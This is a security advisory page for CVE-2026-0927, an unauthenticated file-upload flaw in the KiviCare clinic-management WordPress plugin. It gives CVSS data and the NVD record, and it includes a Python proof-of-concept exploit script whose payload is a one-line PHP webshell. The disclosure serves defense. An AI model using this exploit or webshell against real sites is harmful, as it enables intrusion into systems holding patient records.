Security Vulnerability Report
中文
CVE-2026-0927 CVSS 5.3 MEDIUM

CVE-2026-0927

Published: 2026-01-23 06:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization checks in the uploadMedicalReport() function in all versions up to, and including, 3.6.15. This makes it possible for unauthenticated attackers to upload text files and PDF documents to the affected site's server which may be leveraged for further attacks such as hosting malicious content or phishing pages via PDF files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

KiviCare – Clinic & Patient Management System (EHR) <= 3.6.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-0927 PoC - KiviCare Arbitrary File Upload # Target: WordPress site with KiviCare plugin <= 3.6.15 def exploit_file_upload(target_url, file_content, filename): """ Exploit arbitrary file upload vulnerability in KiviCare plugin uploadMedicalReport() function lacks authorization check """ # Endpoint for medical report upload upload_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious file files = { 'file': (filename, file_content, 'application/pdf') } # Data payload - action triggers uploadMedicalReport() data = { 'action': 'kivicare_medical_report_upload', 'file_name': filename } print(f"[*] Target: {target_url}") print(f"[*] Uploading malicious file: {filename}") try: # Send upload request without authentication response = requests.post( upload_endpoint, files=files, data=data, timeout=30 ) if response.status_code == 200: print(f"[+] File upload request sent successfully") print(f"[+] Response: {response.text[:200]}") # Check if file is accessible uploaded_path = f"{target_url}/wp-content/uploads/kivicare/{filename}" print(f"[*] Check uploaded file at: {uploaded_path}") else: print(f"[-] Upload failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve_2026_0927_poc.py <target_url>") print("Example: python cve_2026_0927_poc.py http://vulnerable-site.com") sys.exit(1) target = sys.argv[1].rstrip('/') # Example malicious content - could be webshell or phishing page malicious_content = "<?php system($_GET['cmd']); ?>" filename = "malicious.php.txt" exploit_file_upload(target, malicious_content, filename)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0927", "sourceIdentifier": "[email protected]", "published": "2026-01-23T06:15:50.480", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The KiviCare – Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to arbitrary file uploads due to missing authorization checks in the uploadMedicalReport() function in all versions up to, and including, 3.6.15. This makes it possible for unauthenticated attackers to upload text files and PDF documents to the affected site's server which may be leveraged for further attacks such as hosting malicious content or phishing pages via PDF files."}, {"lang": "es", "value": "El plugin KiviCare – Sistema de Gestión de Clínicas y Pacientes (EHR) para WordPress es vulnerable a subidas arbitrarias de archivos debido a la falta de comprobaciones de autorización en la función uploadMedicalReport() en todas las versiones hasta la 3.6.15, inclusive. Esto hace posible que atacantes no autenticados suban archivos de texto y documentos PDF al servidor del sitio afectado, lo que puede ser aprovechado para ataques adicionales como alojar contenido malicioso o páginas de phishing a través de archivos PDF."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/tags/3.6.15/app/controllers/KCAppointmentController.php#L1328", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php#L1328", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3443088/kivicare-clinic-management-system/trunk/app/controllers/KCAppointmentController.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/489931ef-bac3-4de8-84ec-6f226d96f778?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.